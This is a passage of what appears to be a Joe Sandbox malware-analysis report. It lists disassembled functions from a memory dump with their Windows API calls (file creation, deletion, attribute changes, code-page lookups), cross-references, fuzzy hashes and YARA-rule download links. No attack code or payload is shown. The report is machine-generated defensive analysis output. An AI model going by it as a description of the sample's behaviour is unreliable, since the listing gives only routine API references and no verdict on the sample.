LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 00B8C19D

Strings

LCMapStringEx, xrefs: 00B8C13D, 00B8C147

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 39203c0684857188945f3e14d10ade9c13e3920b69117ca2fe26da550e5165bc
Instruction ID: 2051fbbb2ad81b7394f23acfda16e3687a90df6d8db599f4a3e7e3b4152e98da
Opcode Fuzzy Hash: 39203c0684857188945f3e14d10ade9c13e3920b69117ca2fe26da550e5165bc
Instruction Fuzzy Hash: 1D01C272541109BBCF02AFA0DC06DAE7FA2EB09750F054595BE1826171CB369961EF90

Function 00B8C0CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00B8B72F), ref: 00B8C115

Strings

InitializeCriticalSectionEx, xrefs: 00B8C0DB, 00B8C0E5

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 2efedbc28802941504e65db4292e6d08f524829736085bd9de945d315485b70a
Instruction ID: 7d2a040b8f65ae6b1d16de694467377a154533da0084fe4870b563523854a206
Opcode Fuzzy Hash: 2efedbc28802941504e65db4292e6d08f524829736085bd9de945d315485b70a
Instruction Fuzzy Hash: 3CF0BE71A41218BBCF11BF60CC06CAE7FE1EB197A0B0040A6FC196A271CF319D11EB94

Function 00B8BF6F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00B8BFAE

Strings

FlsAlloc, xrefs: 00B8BF80, 00B8BF8A

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 5a51ee3fa8648b3a8fa038e090f49c44ec569f0f5bcb5dbf678607e36bdbb8ac
Instruction ID: 67c738ad130c1bfc5599b4bac37934d98312d19cd6b76c62ee4f95bb51a2b3f5
Opcode Fuzzy Hash: 5a51ee3fa8648b3a8fa038e090f49c44ec569f0f5bcb5dbf678607e36bdbb8ac
Instruction Fuzzy Hash: B4E0E531640218AB8A007B649D02D7EBBD5DB19B20F1101EAFD15A7270CF716D02DBDA

Function 00B7FD58 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7FD6A

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Strings

3Uo, xrefs: 00B7FD58, 00B7FD64

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Uo
API String ID: 1269201914-397643623
Opcode ID: 1408c440295d749bde76bfc8a2151c3cc51ff2d19f73d080c22cea6e4b6e480c
Instruction ID: 56414d609b789cb507a27d70a0af6c37cbf81f3f2f43047dfa83999f739f473d
Opcode Fuzzy Hash: 1408c440295d749bde76bfc8a2151c3cc51ff2d19f73d080c22cea6e4b6e480c
Instruction Fuzzy Hash: 4DB012932685027F372421512C03F3601CCC4C0B11330C5FEF016C0040A4406C840036

Function 00B8CDB0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00B8C97B: GetOEMCP.KERNEL32(00000000,?,?,00B8CC04,?), ref: 00B8C9A6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00B8CC49,?,00000000), ref: 00B8CE24
GetCPInfo.KERNEL32(00000000,00B8CC49,?,?,?,00B8CC49,?,00000000), ref: 00B8CE37

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 4acd884430c4aa73017404e3642d5bb2088985718e665294780633689279f39b
Instruction ID: 7868689ef556c3543fb4ae9d00259b896eae371c763028c5cb17e727d89469ad
Opcode Fuzzy Hash: 4acd884430c4aa73017404e3642d5bb2088985718e665294780633689279f39b
Instruction Fuzzy Hash: 3A51F3B19042059EEB21BF75C8816BBBFE5EF41300F1484EED19697272D735A94ACBA0

Function 00B6ACD4 Relevance: 3.1, APIs: 2, Instructions: 134COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-000018C0,00000000,00000800,?,00B6ACB0,?,?,00000000,?,?,00B69C8B,?), ref: 00B6AE3A
GetLastError.KERNEL32(?,?,00B69C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 00B6AE49

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 92291d569aed28c3deffb1d9465ccefe0a1dbf8b0197dc053b6524ea972ee900
Instruction ID: 677ad626784e1ee8ceed11bb095935ab6ca7b49db7739282638a807aa168dc33
Opcode Fuzzy Hash: 92291d569aed28c3deffb1d9465ccefe0a1dbf8b0197dc053b6524ea972ee900
Instruction Fuzzy Hash: 0F4115352043459BDF24AF24C9C4AAAB3E5FB48352F2005BAE945A3A50DB79EC85CF53

Function 00B8CBE7 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00B8A515: GetLastError.KERNEL32(?,00BA30C4,00B85982,00BA30C4,?,?,00B853FD,?,?,00BA30C4), ref: 00B8A519
Part of subcall function 00B8A515: _free.LIBCMT ref: 00B8A54C
Part of subcall function 00B8A515: SetLastError.KERNEL32(00000000,?,00BA30C4), ref: 00B8A58D
Part of subcall function 00B8A515: _abort.LIBCMT ref: 00B8A593

Part of subcall function 00B8CD0E: _abort.LIBCMT ref: 00B8CD40
Part of subcall function 00B8CD0E: _free.LIBCMT ref: 00B8CD74

Part of subcall function 00B8C97B: GetOEMCP.KERNEL32(00000000,?,?,00B8CC04,?), ref: 00B8C9A6

_free.LIBCMT ref: 00B8CC5F
_free.LIBCMT ref: 00B8CC95

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 32dcbb6fb8844a45e27f333874ecbcd88d0c584c4baafa678ea134d222be18b8
Instruction ID: 588c41e0cdf6bd9aa03af82ad778428f63378dc438fb2d20d790d66f4d730037
Opcode Fuzzy Hash: 32dcbb6fb8844a45e27f333874ecbcd88d0c584c4baafa678ea134d222be18b8
Instruction Fuzzy Hash: CB3193B1904204AFDB10FF69D441AA97FF5EF41720F2540DAE5089B2B1EB769D41DFA0

Function 00B6B032 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B67ED0,?,?,?,00000000), ref: 00B6B04C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00B6B100

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 5e7cf90c17c8d3da4b56eecd0475763d8750ce50daf607cd850c824799f8fdc6
Instruction ID: f66935b8f49730ab9968060f28b7fa12c4de04ec776c2e45fa0cbdeb32949c58
Opcode Fuzzy Hash: 5e7cf90c17c8d3da4b56eecd0475763d8750ce50daf607cd850c824799f8fdc6
Instruction Fuzzy Hash: 9421D0312492419BC714DF64C891EABBFF8EF55304F04499DF4E5C3151E729EA4C9B62

Function 00B6A8CE Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B6B1B7,?,?,00B681FD), ref: 00B6A946
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B6B1B7,?,?,00B681FD), ref: 00B6A976

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e8e9e6e0eaf0917233c532da10e541d7654ce8a8b848da785fe547eb571535ad
Instruction ID: 43c6d8ee48aedd5681b2a871539ff0f534af8581a4a2f19b31a27a29d8d76123
Opcode Fuzzy Hash: e8e9e6e0eaf0917233c532da10e541d7654ce8a8b848da785fe547eb571535ad
Instruction Fuzzy Hash: B82122715003446EE7308A29CC88FB376DCEB49360F510A59FAD9D21C1C778A8858A72

Function 00B61F30 Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B61F35

Part of subcall function 00B642F1: __EH_prolog.LIBCMT ref: 00B642F6

_wcslen.LIBCMT ref: 00B61FDA

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: be481e8abc14b64ef1bc3b62619f64304411267ebb32b471361eb3bcd39de86c
Instruction ID: 24b90c878cafed863df69a49645965b4ac1bcc0b6172b1659ce892274cc150a5
Opcode Fuzzy Hash: be481e8abc14b64ef1bc3b62619f64304411267ebb32b471361eb3bcd39de86c
Instruction Fuzzy Hash: D8216D71904219AFCF11AF98C8919EEFBF6FF08300F1448ADF459A72A1C7795951DB50

Function 00B84D02 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,00000001,00BC40C4,?,?,?,00B84EF6,00000004,InitializeCriticalSectionEx,00B97424,InitializeCriticalSectionEx,00000000,?,00B84CAD,00BC40C4,00000FA0), ref: 00B84D85
GetProcAddress.KERNEL32(00000000,?), ref: 00B84D8F

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID:
API String ID: 3013587201-0
Opcode ID: fc223de1c78c4bec9c84cb959f095f4808c7cfe9d7a023803a6c6c0011bf9c4d
Instruction ID: a498ab03ca263b036ce642bf78e6e79de0704108876d9826d056d309b4bbd691
Opcode Fuzzy Hash: fc223de1c78c4bec9c84cb959f095f4808c7cfe9d7a023803a6c6c0011bf9c4d
Instruction Fuzzy Hash: 89118136601516EF8B22EFA4E8909A977E4FB5A35072401B9E915EB260EB30DD01CBD0

Function 00B6B110 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00B6B157
GetLastError.KERNEL32 ref: 00B6B164

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 85095501c0656833f851cc257e1b982d8248245846f5f9c13c544872c6f42312
Instruction ID: 75e46f411953834b87154eba0d3e5c9272732d9f14fbb73084003e0aa1b458c9
Opcode Fuzzy Hash: 85095501c0656833f851cc257e1b982d8248245846f5f9c13c544872c6f42312
Instruction Fuzzy Hash: 4811E531660700BBD7359B24C855FA6B3F9FB06360F5046AAE252E31D0D778ED85C750

Function 00B8A6A4 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B8A6C5

Part of subcall function 00B8A7FE: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B85594,?,0000015D,?,?,?,?,00B86A70,000000FF,00000000,?,?), ref: 00B8A830

HeapReAlloc.KERNEL32(00000000,?,?,?,?,00BA30C4,00B6187A,?,?,00000007,?,?,?,00B613F2,?,00000000), ref: 00B8A701

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 18d78f32fca0352253ba9d4d47d757e94d79585636a017db44bacdda5a401dd4
Instruction ID: 2e1d5073b7151026682f3b4750131b817ef6bedc82f33eb61e9ebdfe0ca08afe
Opcode Fuzzy Hash: 18d78f32fca0352253ba9d4d47d757e94d79585636a017db44bacdda5a401dd4
Instruction Fuzzy Hash: 82F0C231101101A7BB213A25AC41F6B37E8DF82BB0B284097F815960B4FF25CC10E76B

Function 00B723BD Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00B723CA
GetProcessAffinityMask.KERNEL32(00000000), ref: 00B723D1

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: a97d6661746644a311074d673e424d131d407ea796ee328e5e1dc524cd02c018
Instruction ID: ccd288bd118ffdfb0042557c17dd7f37436dabfeb320b60009af3dbc746ee552
Opcode Fuzzy Hash: a97d6661746644a311074d673e424d131d407ea796ee328e5e1dc524cd02c018
Instruction Fuzzy Hash: 33E0D832F10105AF8F0987F4AC158EF73DCDA4420531181B6A527E3100FA78DE0547A4

Function 00B6B8E6 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B8FA

Part of subcall function 00B6CF32: _wcslen.LIBCMT ref: 00B6CF56

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B6B5B5,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B92B

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: b2089d8a0b3ac56d6d2a5a7300c1619457936848c22fdfe7206178bedd4af7d2
Instruction ID: f74870c74e91736db6e3e1f28ef03d983862217b13230f916dbf5a2ae5318ed8
Opcode Fuzzy Hash: b2089d8a0b3ac56d6d2a5a7300c1619457936848c22fdfe7206178bedd4af7d2
Instruction Fuzzy Hash: F3F0A93210420ABBDF115FA1CC10FEA3BACFB043C5F0080A1BA48D61A4DB31DD95EA60

Function 00B6B470 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,?,00B6A438,?,?,?,?,00B6892B,?,?,?,00B9380F,000000FF), ref: 00B6B481

Part of subcall function 00B6CF32: _wcslen.LIBCMT ref: 00B6CF56

DeleteFileW.KERNEL32(?,?,?,00000800,?,00B6A438,?,?,?,?,00B6892B,?,?,?,00B9380F,000000FF), ref: 00B6B4AF

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: a913aba488f58b869033a6a00bcf673a4cefc7e43306b7d5126c5f804c1472f6
Instruction ID: a583897aeab7ad4ef94f71a0906088456bd7b91116e3c87d0b8173d244bab9fb
Opcode Fuzzy Hash: a913aba488f58b869033a6a00bcf673a4cefc7e43306b7d5126c5f804c1472f6
Instruction Fuzzy Hash: E1E0D8321402096BEB015F60CC45FEA37EDEF043C2F4440A1BA49D6191DF79DDC5AE50

Function 00B7BD81 Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00B9380F,000000FF), ref: 00B7BDB5
OleUninitialize.OLE32(?,?,?,?,00B9380F,000000FF), ref: 00B7BDBA

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 0319edd091284993fcc71eeb2914990f4d58f34c39b50f3015fca7adf3ac8d80
Instruction ID: 098cd66c12b494c1d0f01ff5f83319a663d1aed1e6f62d025409eed447e7920a
Opcode Fuzzy Hash: 0319edd091284993fcc71eeb2914990f4d58f34c39b50f3015fca7adf3ac8d80
Instruction Fuzzy Hash: FDE03972604A50AFCB109B48DC05B59FBE9FB89A20F14826AB416937A0CF74A801CA94

Function 00B7F002 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

